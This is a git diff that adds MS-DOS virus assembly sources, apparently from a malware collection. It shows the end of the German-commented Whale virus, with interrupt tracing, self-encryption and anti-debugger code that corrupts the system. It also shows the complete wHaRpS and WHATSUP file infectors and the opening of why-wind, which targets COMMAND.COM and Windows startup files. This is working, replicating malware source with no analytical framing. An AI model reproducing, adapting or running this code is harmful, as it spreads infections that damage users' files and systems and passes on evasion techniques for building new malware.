IBMBIO nach 0CBh !!! + REPNZ SCASB ; Also RETF + + DEC DI + + PUSHF + PUSH ES + PUSH DI ; RETURNADRESSE ist "RETF" in IBMBIO.COM + + PUSHF + POP AX + OR AH,01h ; Set TF + PUSH AX + + MCODE 88 + POPF + XOR AX,AX ; Reset Disk :-) + JMP DWORD PTR DS:[Trace_Adres] ; Return ist J0488D + ; JMP INT 13H + DB 0E9h +;===================================================================== +;==========================================( Rckkehr aus INT 13h )=== +;===================================================================== +J0488D: MDECODE 89 + PUSH CS + POP DS + PUSH DS + MOV AL,13h + LDS DX,DWORD PTR CS:[Trace_Adres] + CALL SetInt_AL ; RE-SET INT 13 + POP DS + + MOV AL,24h + CALL GetInt_AL ; GET INT 24 + + MOV WORD PTR DS:[D243D],BX + MOV DX,OFFSET J0444D-Offset VirStart + MOV AL,24h + MOV WORD PTR DS:[D243D+2],ES + CALL SetInt_AL ; SET INT 24 + CALL GetRegsFromVirstack + PUSH DS + PUSH AX + MOV AX,0000h + MOV DS,AX + POP AX + MOV WORD Ptr DS:[0006h],0070h ; Segment INT 01 + ; auf 70h setzen + POP DS + MCODE 89 + RETN + DB 0F6h +;===================================================================== +;===========================================( Reset INT 13+INT 24 )=== +;===================================================================== +J048CD: MDECODE 90 + CALL SaveRegisters + LDS DX,CS:[@Int_13h] ; Alte Adresse INT 13 + MOV AL,13h + CALL SetInt_AL ; SET INT 13 + LDS DX,DWORD PTR CS:[D243D]; Alte Adresse INT 24 + MOV AL,24h + CALL SetInt_AL ; SET INT 24 + CALL GetRegsFromVirstack + MCODE 90 + RET +;=========================================================( trash )=== + PUSH CS + POP AX +;===================================================================== +;=================================================( TRACE INT 21H )=== +;===================================================================== +J048F3: MDECODE 91 + ;----------------------( die Zahl 0401 bedeutet : )--- + ;----------------------( 4 Ebenen, 1. bergehen )--- + + MOV WORD PTR CS:[D2450],0401h + CALL SetInt_01 + CALL PopALL + PUSH AX + MOV AX,CS:[D24B3] + OR AX,0100h ; Set TF + PUSH AX + MCODE 91 + ;--------------------------------------------- + POPF + POP AX + POP BP + JMP CS:[Low_INT_21H] ; JMP INT 21h + ;--------------------------------------------- +;===================================================================== +J0491A: DB 00h ; alias "210A" ! ; Klein, aber fein :-) +;===================================================================== +;==========================( DIE DECODE-ROUTINE )=== +;==========================( Dekodiert jedes Wal-Hhrchen separat )=== +;===================================================================== +J0491B: PUSHF + POP CS:[D258E] + MOV CS:[D2560],AX + MOV CS:[D2562],BX + MOV CS:[D2564],CX + +J0492F: DB 26h,3bh,0,72h,2,0c3h,2,53h,89h,0c1h + DB 032h,0edh,026h,03ah,8,073h,047h,0f8h + +COMMENT # ERGIBT ; + ;------------------------------------------- + POP BX ; POP RETURNADRESSE + MOV AX,CS:[BX] ; GET WORD + ADD BX,+02h ; INC Returnadresse,2 + PUSH BX ; auf den Stack damit + ;-----------------------; AL ist Zhler + MOV CX,AX ; AH ist XOR-byte + XOR CH,CH +J00120: XOR CS:[BX],AH + INC BX + LOOP J00120 + ;------------------------------------------- + # +J04941: MOV AX,CS:[D2560] + MOV BX,CS:[D2562] + MOV CX,CS:[D2564] + PUSH CS:[D258E] + POPF + RETN +;===================================================================== +;=====================================( kodiert das separate Teil )=== +;===================================================================== +VersteckeCodeWieder: + MOV BP,AX +J04958: IN AL,40h ; Hole Zufallszahl <> 0 + OR AL,AL + JZ J04958 + POP BX ; Hole Adresse des Aufrufers + PUSH BX + MOV CX,Offset J02ACC-Offset J02AA8 + SUB BX,CX ; 24h Byte zurckgehen +J04965: XOR CS:[BX],AL + INC BX + LOOP J04965 + CALL J0496E +J0496E: POP BX + ADD BX,Offset SpielByte-Offset J0496E + ; Adresse "Spielbyte" holen + MOV CS:[BX],AL ; und den Dekodierer impfen + MOV AX,BP + RETN +;===================================================================== +;=======================================( dekodiert den Relokator )=== +;===================================================================== +DecodeFollowingCode: + MOV BP,AX ; AX sichern + POP BX + PUSH BX + MOV CX,Offset J02ACC-Offset J02AA8 +J0497F: XOR BYTE PTR CS:[BX],0 ; <== "Spielbyte" +Spielbyte EQU $-1 + INC BX +J04984: LOOP J0497F + MOV AX,BP +J04987 EQU $-1 ; CALL NIRWANA ! siehe unten ! + RETN ; AX zurueck +;===================================================================== +;========================================( Kodiert jede 'schuppe' )=== +;===================================================================== +CodeIT: PUSHF + POP CS:[D258E] + MOV CS:[D2560],AX + MOV CS:[D2562],BX + MOV CS:[D2564],CX + ;-------------------------------------( aus )----------------- +J0499D: DB 26h,3Bh,8Ah,0Fh,32h,72h,0E3H + ;-------------------------------------( wird )---------------- + ;J0499D: POP BX ; POP returnadresse + ; MOV CL,Byte Ptr CS:[BX] ; Get Byte in CL + ; XOR CH,CH + ; INC BX ; Return eins weiter + ;------------------------------------------------------------- + PUSH BX + MOV AX,0001h + ADD AX,CX ; AX ist Byte + 1 + SUB BX,AX ; BX ist Returnadresse-AX + ;-------------------------------------( aus )----------------- + DB 043h,040h,00ah,0c0h,074h,0fah + ;-------------------------------------( wird )---------------- + ;J049AC: IN AL,40h + ; OR AL,AL + ; JZ J049AC ; hole Zufallszahl <> 0 + ;------------------------------------------------------------- + MOV CX,CS:[BX] + XOR CH,CH + INC BX + ;-------------------------------------( aus )----------------- + DB 003h,00fh,02eh,03bh,007h,072h,0c7h,0f8h + ;-------------------------------------( wird )---------------- + ; MOV CS:[BX],AL + ;J001A0: INC BX + ; XOR CS:[BX],AL + ; LOOP J001A0 + ;------------------------------------------------------------- +J049C0: CLI + MOV AX,CS:[D2560] + MOV BX,CS:[D2562] + MOV CX,CS:[D2564] + PUSH CS:[D258E] + POPF + RETN +;===================================================================== +;====================================================( Der Tracer )=== +;===================================================================== +Int_01_Entry: PUSH BP + MOV BP,SP + PUSH AX + CMP WORD Ptr [BP+04h],0C000h ; Callers Segment + JNB J049ED ; hher als C000h + MOV AX,CS:[D2447] ; oder tiefer + CMP [BP+04h],AX ; als D2447 + JBE J049ED +J049EA: POP AX + POP BP + IRET +;===================================================================== +J049ED: CMP BYTE PTR CS:[D2450],01h ; Erster + JZ J04A1B + + MOV AX,[BP+04h] ; Callers CS + MOV WORD PTR CS:[Trace_Adres+2],AX + MOV AX,[BP+02h] ; Callers IP + MOV WORD PTR CS:[Trace_Adres ],AX + JB StopTrace ; [D2450] < 1 ? + POP AX + POP BP + MOV SP,CS:[D24DF] + MOV SS,CS:[D24DD] + JMP J0488D ; -> RET hier irgendwo +;==========================================( Trace-Mode abschalten)=== +StopTrace: AND WORD Ptr [BP+06h],0FEFFh + JMP J049EA +;===================================================================== +J04A1B: DEC BYTE PTR CS:[D2450+1] ; Dec (Versuche) + JNZ J049EA ; <> 0 -> weiter + AND WORD Ptr [BP+06h],0FEFFh ; sonst tracen + CALL SaveRegisters ; stoppen und : +;===================================================================== +;=======================( AUS : )===================================== +;===================================================================== +J04A2A: DB 0fch,01eh,0e2h,0e4h,040h +;===================================================================== +;========================( WIRD, ber PATCH )========================= +;===================================================================== + ;CALL J02CDA + ;IN AL,40h +;===================================================================== +;===============================================( XOR-Byte ndern )=== +;===================================================================== + MOV CS:[XorByte__1],AL ; D_4A5E + MOV CS:[XorByte__2],AL ; D_4A79 +;===================================================================== +;=====================================( INT 01 auf INT 03 stellen )=== +;===================================================================== +J04A39: MOV AL,03h + CALL GetInt_AL ; GET INT 3 + + PUSH ES + POP DS + MOV DX,BX ; DS:DX auf INT 3 stellen + MOV AL,01h +;================================================================= +;======( AUS : )================================================== +;================================================================= +J04A42: DB 0e8h,027h +J04A44: DB 01h ; CALL J04B6C + DB 0EAh,072h,0e1h ; JB J04A29 +;================================================================= +;===================( Wird ber PATCH )=========================== +;================================================================= + CALL SetInt_AL ; INT 01 auf INT 03 setzen + CALL POPALL +;^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ + CALL Patch_IBMDOS + CALL GetRegsFromVirstack + CALL Re_SET_Int_02 + POP AX + POP BP ; Stack putzen + + PUSH BX + PUSH CX + MOV BX,PART_____1 + MOV CX,LEN_PART_1 +J04A5B: XOR BYTE PTR CS:[BX],8Eh +D_4A5E EQU $-1 + INC BX + LOOP J04A5B + POP CX + POP BX + IRET ; ENDE von INT 01 / Tracer + DB 0E9h +;===================================================================== +;================================================( INT 21-Handler )=== +;===================================================================== +J04A66: OR BYTE PTR CS:[PART_____1],00h ; = D4BAC + ; ist Wal schon DEkodiert ? + JZ J04A7F + PUSH BX ; Nein. +J04A6F: PUSH CX + MOV BX,PART_____1 + MOV CX,LEN_PART_1 +J04A76: XOR BYTE PTR CS:[BX],8EH +D_4A79 EQU $-1 + INC BX + LOOP J04A76 + POP CX + POP BX +J04A7F: JMP J0458D +;===================================================================== + DB 34h +;===================================================================== +;=======================( INT 09-Handler )=== +;=======================( Bei jedem (!) Tastendruck wird geprft, )=== +;=======================( ob ein Debugger am Werk ist ! )=== +;===================================================================== +J04A83: MDECODE 92 + CALL Patch_INT_09 ; INT 9 restaurieren + CALL Debugger_Check ; Das ist der Witz dabei !!! + PUSHF + CALL CS:[INT_09 ] ; CALL INT 09 + CALL Patch_INT_09 ; Int 9 wieder patchen + MCODE 92 + IRET +;=======================================================()========= + DB 0BCH +;===================================================================== +;=======================================( Save Original-Registers )=== +;===================================================================== +SaveRegs: MOV CS:[D2575],SI + MOV CS:[D2577],DI + MOV CS:[D257B],DS + MOV CS:[D257D],ES +J04AB1: MOV CS:[D2579],AX + MOV CS:[D257F],CX + MOV CS:[D2581],BX + MOV CS:[D2590],DX + RETN + ;----------------------------------------------------- + DB 0E8h + DB 01h +;===================================================================== +;=============================( PATCHT vorhandenen INT 09-Handler )=== +;===================================================================== +KeyBoard DB 0 +Patch_INT_09: MDECODE 93 + CALL SaveRegs +;----------------------------------------------------------- + MOV SI,Offset D2570 + LES DI,CS:[INT_09 ] ; GET original INT 09 + PUSH CS + POP DS + CLD +;---------------------------( Tauscht 5 Byte ab CS:D2570 -> ES:DI )-- + MOV CX,0005h +J04ADD: LODSB + XCHG AL,ES:[DI] + MOV [SI-01h],AL + INC DI + LOOP J04ADD +;----------------------------------------( anzeige )------------------- + MOV AX,0B800H + MOV ES,AX + XOR DI,DI + CMP byte ptr cs:[Offset Keyboard-Offset VirStart],1 + MOV Byte ptr cs:[Offset Keyboard-Offset VirStart],0 + MOV AX,432EH + JZ ToOriginal + MOV Byte ptr cs:[Offset Keyboard-Offset VirStart],1 + MOV AX,4b57h +ToOriginal: STOSW +;----------------------------------------------------------- + CALL RestoreRegs + MCODE 93 + RETN +;===================================================================== +;====================================( GET INT 01 + INT 03 )=== +;====================================( Check, ob Debugger werkelt )=== +;===================================================================== +Debugger_Check: + MDECODE 94 + MOV CS:[D2581],BX + MOV CS:[D257D],ES + XOR BX,BX + MOV ES,BX + MOV BX,ES:[0006h] ; GET Offset von INT 01 + CMP BX,CS:[D2447] + JNB J04B27 ; TRACER AM WERK + MOV BX,ES:[000Eh] ; GET Offset von INT 03 + CMP BX,CS:[D2447] + JNB J04B27 ; DEBUGGER AM WERK + MOV ES,CS:[D257D] + MOV BX,CS:[D2581] + JMP J04B76 +;===================================================================== +;=================================================( Kill System ! )=== +;===================================================================== +J04B27: POP BX ; POP returnadresse + CALL PushALL + CALL Patch_IBMDOS ; DOS patchen + CALL PopALL + + MOV BX,CS:[D2581] + MOV ES,CS:[D257D] + + PUSHF + CALL CS:[INT_09 ] ; CALL INT 09 + + CALL PushALL + + MOV AH,51h ; get current PSP + CALL CS:[@INT21] + + MOV ES,BX +J04B4D: + MOV WORD PTR ES:[000Ch],0FFFFh; Terminate-Adresse + MOV WORD PTR ES:[000Ah],0000h ; ist FFFF:0000 !?! + CALL PopALL + CALL SaveRegs + ;---------------------------------( Wal zerstren )--- + MOV CX,IfDebugWal ; 1185h ; 230Ah Byte + MOV BX,StartDebug ; 004Fh ; ab 4Fh / 285Fh + MOV AX,0802h ; mit 0802h verORen +J04B6A: OR CS:[BX],AX ; bis 4B69 , logisch, oder .... + ADD BX,+02h + LOOP J04B6A + ;---------------------------------------------------- + CALL RestoreRegs + IRET +;===================================================================== +;=========================================( Kein Debugger am Werk )=== +;===================================================================== +J04B76: MCODE 94 + RET +D4B7C: DB 0E8h +;===================================================================== +;=========( Verwischt Spuren und springt in oberen Speicherbereich)=== +;===================================================================== +Schwimme_Fort: OR BYTE PTR CS:[BX],15h ; CX = 236Ch + INC BX ; BX = 0 + LOOP Schwimme_Fort ; also von 2810 bis D4B7C + ; alles lschen + RETF ; RETF nach + ; Oberen-Speicher:01B1 + ; Identisch mit CS:29C1 +;===================================================================== +;========================================( Get Original-Registers )=== +;===================================================================== +RestoreRegs: MOV AX,CS:[D2579] + MOV ES,CS:[D257D] + MOV DS,CS:[D257B] + MOV SI,CS:[D2575] + MOV DI,CS:[D2577] + MOV CX,CS:[D257F] + MOV BX,CS:[D2581] + MOV DX,CS:[D2590] +L0L0L0: RETN +;---------------------------------------------------------------------- +D4BAC DB 00h ; Signal-Byte zur Erkennung, + ; ob Wal dekodiert ist oder nicht +;===================================================================== +;=============================================( Verschlsselt WAL )=== +;===================================================================== +Code_Whale: PUSH CX + PUSH BX + MOV BX,FirstByte + MOV CX,Code_len ; 2385h ; Wal-Size +LASTCODE: ;^^^^^^^^^^^-- LETZTES VERSCHLUESSELTE BYTE ! +;--------------------------------------------------------------------- +D4BB5: ;vvvvvvvvvvv-- HIERHER WERDEN DIE MUTANTEN KOPIERT ! + PUSH DX + MOV DH,[BX-01h] +J04BB9: MOV DL,[BX ] + ADD [BX],DH + XCHG DL,DH + INC BX + LOOP J04BB9 + + POP DX + POP BX + POP CX + PUSH SI + MOV SI,2567h + DEC SI + CALL [SI] ; CALL INT 21h +;===================================================================== +;============================================( Normaler Einsprung )=== +;===================================================================== +Decode_Whale: CALL J04BD1 +J04BCF: XOR BX,SI ; DUMMY ! +J04BD1: XOR SI,1876h ; SI = 1876, kann immer + ; gendert werden + POP BX ; BX = 4BCF + POP SI + SUB BX,Code_start ; BX = 2830 + MOV CX,Code_Len ; CX = 2385 wal-size + PUSH CS + POP DS +J04BE0: MOV AL,[BX-01h] + SUB [BX],AL + INC BX + LOOP J04BE0 + ; BX = 4BB5 + ADD BX,008Eh ; BX = 4C43 / 2433 + XCHG SI,BX + DEC BYTE Ptr DS:[SI] + JNZ J04BF5 + XCHG BX,SI + RETN ; +;===================================================================== +;==============================================( Sprung zu ENTRY )=== +;===================================================================== +J04BF5: PUSH ES ; SI ist 4C43 + XOR AX,AX + POP DS + JMP ENTRY +;===================================================================== +;==========================================================( ENDE )=== +;===================================================================== + DW 0CE8BH + DW 05605H +LASTBYTE: DB 34H + +J04C01: DW 00045h + DW 05000h + DW 0DCE3h + DW 09000h + DW 00000h + DW 01F00H + DW 02000H + DB 10H +;============================================================================ +code ENDS + END start + diff --git a/MSDOS/Virus.MSDOS.Unknown.wharps.asm b/MSDOS/Virus.MSDOS.Unknown.wharps.asm new file mode 100644 index 00000000..abbed344 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.wharps.asm @@ -0,0 +1,336 @@ +; "One must crawl before one walks." +; wHaRpS Virus 1.0 +; wHaRpS virus of independent virus writer FirstStrike +; For use by [Phalcon\Skism] ONLY! +; Special thanx to: +; Gheap +; Dark Angel +; Demogorgon + + +name wHaRpS + title +code segment + assume cs:code,ds:code + org 100h + + +dta equ 65000d ; DTA address to be set +fname equ 65000d + 1eh ; DTA - file name +ftime equ 65000d + 16h ; DTA - file time +fsize equ 65000d + 1ah ; DTA - file size +orgdir equ 65400d ; original path storage +date equ 65300d ; store file date +time equ 65302d ; store file time +attrib equ 65304d ; store file attrib +err1 equ 65306d ; old error handler address +err2 equ 65308d ; old error handler address + +olddta equ 80h ; original DTA address + + + +begin: + nop + nop + nop + call setup ; find "delta offset" +setup: + pop bp + sub bp, offset setup + jmp main ; DEBUG E8 02 00 + nop + jmp main + +crypt_em: + xor di,di + lea si, [bp+main] + mov di, si + mov cx, end_crypt - main + +xor_loop: + lodsb ; ds:[si] -> al + db 34h ; xor al, XX +encrypt_val db 0 ; Starting encryption value is 0 + stosb ; al ->es:[di] + loop xor_loop + ret + +main: + xor di,di + mov di,0100h ; Restore first three + lea si,[bp+saveins] ; original program bytes + mov cx,0003d + rep movsb + jmp system_pic ; Take a "picture" of system settings + +handler: ; error handler + mov al,0 + iret +endp + + +data label byte +wharps db '[wHaRpS]',0 ; wHaRpS ID +author db 'FrsStrk',0 ; Me +dir_mask db '*.',0 ; dir atrib +allcom db '*.COM',0 ; what to search for +root db '\',0 ; root +saveins db 0e8h,00h,00h ; original three bytes +ultimate dw 0 ; ultimate dir to be reached +current dw 0 ; current dir +message db 'wHaRpS! It is 3:00 a.m. > ETERNAL $' + +system_pic: ; SNAP! + mov ah,47h ; get original path + mov dl,0 + lea si,cs:orgdir ; store original path + int 21h + +crypt_change: ; set crypt value + mov ah,2ch + int 21h + mov [bp+encrypt_val],dl + cmp ch,03 + jz more + jmp errorh + +more: + cmp cl,00 + jz bomb + jmp errorh + +bomb: + mov ah,09h + lea dx,[bp+message] + int 21h + mov ah,4ch + int 21h + +errorh: + push es ; save original error handler address + mov ax,3524h + int 21h + mov word ptr cs:err1,bx + mov word ptr cs:err2,es + pop es + + mov ax,2524h ; set an error handler + lea dx, [bp+offset handler] ; no more Retry,Abort,Fail deals + int 21h + jmp pre_search + +drop_to_root: ; subroutine to visit the root + lea dx,[bp+root] + jmp continue + +set_path: ; OR set a path + lea dx,cs:fname + +continue: + mov ah,3bh + int 21h + ret + +return_to_search: + inc [bp+ultimate] + call drop_to_root + mov [bp+current],0000 + jmp find_first_dir + + +pre_search: ; set a DTA + mov dx,dta + mov ah,1ah + int 21h + + mov [bp+current],0000 ; zero the counters + mov [bp+ultimate],0000 ; "" + inc [bp+ultimate] ; want to search 1st dir in root + call drop_to_root ; bomb to root + +find_first_dir: ; directory searchin' + lea dx,[bp+dir_mask] + mov cx,16 + mov ah,4Eh + int 21h + jc almost_done ; no directories? + +dir_test: + inc [bp+current] ; directory found - MARK! + mov bx,[bp+current] + cmp word ptr [bp+ultimate],bx ; is it the one we want? + jnz find_next_dir ; no, find another + call set_path ; yes, set the correct path + jmp find_first_file ; find some .COMs + + + +find_next_dir: ; mo' directory searchin' + mov ah,4fh + int 21h + jc almost_done + jmp dir_test ; go see if correct dir found yet + + + +find_first_file: ; file searchin' + lea dx,[bp+allcom] + mov cx,00000001b + mov ah,4Eh + int 21h + jc return_to_search ; no .COM so mo' dir + jmp check_if_ill ; is the file "sick"? + + + +find_next_file: ; keep on a searchin' + mov ah,4fh + int 21h + jc return_to_search ; no more .COM so back + ; to the directories + +check_if_ill: ; check file's health + mov ax,cs:ftime + and al,11111b ; good, your sick! + cmp al,62d/2 ; (No more 62 seconds as virus + jz find_next_file ; markers! - I swear!) + + cmp cs:fsize,60000d ; whoa, file to big! + ja find_next_file ; so, get a new one + + cmp cs:fsize,500d ; whoa, file to small! + jb find_next_file ; throw it back and move on + jmp infect ; perfect, for infection + + db 'Joy J.',0 ; don't ask + +error: +pre_done: +almost_done: + jmp done ; in case of emergency..... + +infect: + mov ah,43h ; save original attribute + mov al,00h + lea dx,cs:[fname] + int 21h + mov cs:attrib,cx + jc pre_done + + mov ax,4301h ; clear all attributes + and cx,11111110b ; (none shall slow progress) + int 21h + jc pre_done + + + mov ax,3d02h ; open the file, please + int 21h + jc pre_done + xchg bx,ax + + + + mov ax,5700h ; save the date/time + int 21h + mov cs:time,cx + mov cs:date,dx + jc pre_done + + + mov ah,3Fh ; read first 3 bytes of file + mov cx,0003h ; to be infected and save + lea dx,[bp+saveins] + int 21h + jc pre_done + + mov ax,4202h ; move to end of file + xor cx,cx + xor dx,dx + int 21h + jc pre_done + mov [bp+new_jmp],ax + + call crypt_em + +end_crypt label byte ; encrypt to here + + mov ah,40h + mov cx,endcode-begin + lea dx,[bp+begin] + int 21h ; encrypt n' write virus to end of + jc done ; file + + mov ax,4200h ; go to beginning of file + xor cx,cx + xor dx,dx + int 21h + jc done + jmp cont + +jmpc db 0e9h +new_jmp dw ? + +cont: + mov ah,40h + mov cl,3 + lea dx,[bp+jmpc] + int 21h + jc done + +attrib_stuff: + + mov ax,5701h + mov cx,cs:[time] + mov dx,cs:[date] + or cl,11111b + int 21h + jc done + + mov ah,3eh + int 21h + jc done + + mov ax,4301h + mov cx,cs:[attrib] + lea dx,cs:[fname] + int 21h + jc done + +done: + mov dx,olddta ; restore all changes + mov ah,1ah + int 21h + + push ds + mov ax,2524h + lea dx,cs:[err2] + mov ds,dx + lea dx,cs:[err1] + int 21h + pop ds + + mov ah,3bh + mov dx,'/' + int 21h + + mov ah,3bh + lea dx,cs:[orgdir] + int 21h + + xor di,di + mov di,0100h + jmp di ; good_bye + + + + +endcode label byte + + + + +code ends +end begin + + diff --git a/MSDOS/Virus.MSDOS.Unknown.whatsup.asm b/MSDOS/Virus.MSDOS.Unknown.whatsup.asm new file mode 100644 index 00000000..2688a7e9 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.whatsup.asm @@ -0,0 +1,300 @@ +; WHATSUP.ASM -- Whats Up Virus +; Created with Nowhere Man's Virus Creation Laboratory v1.00 +; Written by Unknown User + +virus_type equ 2 ; Spawning Virus +is_encrypted equ 1 ; We're encrypted +tsr_virus equ 0 ; We're not TSR + +code segment byte public + assume cs:code,ds:code,es:code,ss:code + org 0100h + +start label near + +main proc near + call encrypt_decrypt ; Decrypt the virus + +start_of_code label near + +stop_tracing: mov cx,09EBh + mov ax,0FE05h ; Acutal move, plus a HaLT + jmp $-2 + add ah,03Bh ; AH now equals 025h + jmp $-10 ; Execute the HaLT + mov bx,offset null_vector ; BX points to new routine + push cs ; Transfer CS into ES + pop es ; using a PUSH/POP + int 021h + mov al,1 ; Disable interrupt 1, too + int 021h + jmp short skip_null ; Hop over the loop +null_vector: jmp $ ; An infinite loop +skip_null: mov byte ptr [lock_keys + 1],130 ; Prefetch unchanged +lock_keys: mov al,128 ; Change here screws DEBUG + out 021h,al ; If tracing then lock keyboard + + + mov ah,04Ah ; DOS resize memory function + mov bx,(finish - start) / 16 + 0272h ; BX holds # of para. + int 021h + + mov sp,(finish - start) + 01100h ; Change top of stack + + mov si,offset spawn_name ; SI points to true filename + int 02Eh ; DOS execution back-door + push ax ; Save return value for later + + mov ax,cs ; AX holds code segment + mov ds,ax ; Restore data segment + mov es,ax ; Restore extra segment + + mov cx,0063h ; Do 99 infections +search_loop: push cx ; Save CX + call search_files ; Find and infect a file + pop cx ; Restore CX + loop search_loop ; Repeat until CX is 0 + + pop ax ; AL holds return value + mov ah,04Ch ; DOS terminate function + int 021h +main endp + + + db 06Fh,050h,0CAh,0F9h,065h + +search_files proc near + push bp ; Save BP + mov bp,sp ; BP points to local buffer + sub sp,64 ; Allocate 64 bytes on stack + + mov ah,047h ; DOS get current dir function + xor dl,dl ; DL holds drive # (current) + lea si,[bp - 64] ; SI points to 64-byte buffer + int 021h + + mov ah,03Bh ; DOS change directory function + mov dx,offset root ; DX points to root directory + int 021h + + call traverse ; Start the traversal + + mov ah,03Bh ; DOS change directory function + lea dx,[bp - 64] ; DX points to old directory + int 021h + + mov sp,bp ; Restore old stack pointer + pop bp ; Restore BP + ret ; Return to caller + +root db "\",0 ; Root directory +search_files endp + +traverse proc near + push bp ; Save BP + + mov ah,02Fh ; DOS get DTA function + int 021h + push bx ; Save old DTA address + + mov bp,sp ; BP points to local buffer + sub sp,128 ; Allocate 128 bytes on stack + + mov ah,01Ah ; DOS set DTA function + lea dx,[bp - 128] ; DX points to buffer + int 021h + + mov ah,04Eh ; DOS find first function + mov cx,00010000b ; CX holds search attributes + mov dx,offset all_files ; DX points to "*.*" + int 021h + jc leave_traverse ; Leave if no files present + +check_dir: cmp byte ptr [bp - 107],16 ; Is the file a directory? + jne another_dir ; If not, try again + cmp byte ptr [bp - 98],'.' ; Did we get a "." or ".."? + je another_dir ;If so, keep going + + mov ah,03Bh ; DOS change directory function + lea dx,[bp - 98] ; DX points to new directory + int 021h + + call traverse ; Recursively call ourself + + pushf ; Save the flags + mov ah,03Bh ; DOS change directory function + mov dx,offset up_dir ; DX points to parent directory + int 021h + popf ; Restore the flags + + jnc done_searching ; If we infected then exit + +another_dir: mov ah,04Fh ; DOS find next function + int 021h + jnc check_dir ; If found check the file + +leave_traverse: + mov dx,offset exe_mask ; DX points to "*.EXE" + call find_files ; Try to infect a file +done_searching: mov sp,bp ; Restore old stack frame + mov ah,01Ah ; DOS set DTA function + pop dx ; Retrieve old DTA address + int 021h + + pop bp ; Restore BP + ret ; Return to caller + +up_dir db "..",0 ; Parent directory name +all_files db "*.*",0 ; Directories to search for +exe_mask db "*.EXE",0 ; Mask for all .EXE files +traverse endp + + db 0B1h,043h,04Ah,043h,07Bh + + +find_files proc near + push bp ; Save BP + + mov ah,02Fh ; DOS get DTA function + int 021h + push bx ; Save old DTA address + + mov bp,sp ; BP points to local buffer + sub sp,128 ; Allocate 128 bytes on stack + + push dx ; Save file mask + mov ah,01Ah ; DOS set DTA function + lea dx,[bp - 128] ; DX points to buffer + int 021h + + mov ah,04Eh ; DOS find first file function + mov cx,00100111b ; CX holds all file attributes + pop dx ; Restore file mask +find_a_file: int 021h + jc done_finding ; Exit if no files found + call infect_file ; Infect the file! + jnc done_finding ; Exit if no error + mov ah,04Fh ; DOS find next file function + jmp short find_a_file ; Try finding another file + +done_finding: mov sp,bp ; Restore old stack frame + mov ah,01Ah ; DOS set DTA function + pop dx ; Retrieve old DTA address + int 021h + + pop bp ; Restore BP + ret ; Return to caller +find_files endp + + db 011h,019h,099h,0B6h,0BDh + +infect_file proc near + mov ah,02Fh ; DOS get DTA address function + int 021h + mov di,bx ; DI points to the DTA + + lea si,[di + 01Eh] ; SI points to file name + mov dx,si ; DX points to file name, too + mov di,offset spawn_name + 1; DI points to new name + xor ah,ah ; AH holds character count +transfer_loop: lodsb ; Load a character + or al,al ; Is it a NULL? + je transfer_end ; If so then leave the loop + inc ah ; Add one to the character count + stosb ; Save the byte in the buffer + jmp short transfer_loop ; Repeat the loop +transfer_end: mov byte ptr [spawn_name],ah; First byte holds char. count + mov byte ptr [di],13 ; Make CR the final character + + mov di,dx ; DI points to file name + xor ch,ch ; + mov cl,ah ; CX holds length of filename + mov al,'.' ; AL holds char. to search for + repne scasb ; Search for a dot in the name + mov word ptr [di],'OC' ; Store "CO" as first two bytes + mov byte ptr [di + 2],'M' ; Store "M" to make "COM" + + mov byte ptr [set_carry],0 ; Assume we'll fail + mov ax,03D00h ; DOS open file function, r/o + int 021h + jnc infection_done ; File already exists, so leave + mov byte ptr [set_carry],1 ; Success -- the file is OK + + mov ah,03Ch ; DOS create file function + mov cx,00100111b ; CX holds file attributes (all) + int 021h + xchg bx,ax ; BX holds file handle + + call encrypt_code ; Write an encrypted copy + + mov ah,03Eh ; DOS close file function + int 021h + +infection_done: cmp byte ptr [set_carry],1 ; Set carry flag if failed + ret ; Return to caller + +spawn_name db 12,12 dup (?),13 ; Name for next spawn +set_carry db ? ; Set-carry-on-exit flag +infect_file endp + + +vcl_marker db "[VCL]",0 ; VCL creation marker + + +note db "Whats Up Virus" + db "By White Shark" + db "Mess with the White Shark and" + db "you'll be eaten alive!" + +encrypt_code proc near + mov si,offset encrypt_decrypt; SI points to cipher routine + + xor ah,ah ; BIOS get time function + int 01Ah + mov word ptr [si + 8],dx ; Low word of timer is new key + + xor byte ptr [si],1 ; + xor byte ptr [si + 7],1 ; Change all SIs to DIs + xor word ptr [si + 10],0101h; (and vice-versa) + + mov di,offset finish ; Copy routine into heap + mov cx,finish - encrypt_decrypt - 1 ; All but final RET + push si ; Save SI for later + push cx ; Save CX for later + rep movsb ; Copy the bytes + + mov si,offset write_stuff ; SI points to write stuff + mov cx,5 ; CX holds length of write + rep movsb ; Copy the bytes + + pop cx ; Restore CX + pop si ; Restore SI + inc cx ; Copy the RET also this time + rep movsb ; Copy the routine again + + mov ah,040h ; DOS write to file function + mov dx,offset start ; DX points to virus + + call finish ; Encrypt/write/decrypt + + ret ; Return to caller + +write_stuff: mov cx,finish - start ; Length of code + int 021h +encrypt_code endp + +end_of_code label near + +encrypt_decrypt proc near + mov si,offset start_of_code ; SI points to code to decrypt + mov cx,(end_of_code - start_of_code) / 2 ; CX holds length +xor_loop: db 081h,034h,00h,00h ; XOR a word by the key + inc si ; Do the next word + inc si ; + loop xor_loop ; Loop until we're through + ret ; Return to caller +encrypt_decrypt endp +finish label near + +code ends + end main \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.why-wind.asm b/MSDOS/Virus.MSDOS.Unknown.why-wind.asm new file mode 100644 index 00000000..83c3c558 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.why-wind.asm @@ -0,0 +1,221 @@ +seg_a segment byte public + assume cs:seg_a, ds:seg_a + + + org 100h + +ww proc far + +start: + jmp loc_2 + db 12 dup (90h) + db 0CDh, 20h +loc_2: + jmp short loc_3 + db 90h, 2Ah, 2Eh, 63h, 6Fh, 6Dh + db 00h, 00h +data_8 db 'C:\Command.Com', 0 + db 'C:\Autoexec.Bat', 0 + db 'C:\Config.Sys', 0 + db '\win' +data_12 dw 6F64h + db 'ws\win.com' + db 00h,0E9h, 0Eh, 00h, 90h,0C8h + db 01h +loc_3: + mov bx,101h + mov ah,[bx] + mov bx,102h + mov al,[bx] + xchg al,ah + add ax,3 + mov si,ax + mov ah,1Ah + lea dx,[si+2C8h] + add dx,6 + int 21h + + mov ah,4Eh + lea dx,[si+103h] + mov cx,6 + int 21h + + cmp ax,12h + je loc_7 + lea dx,[si+10Ah] + jmp short loc_6 + db 90h +loc_5: + mov ah,4Dh + int 21h + + 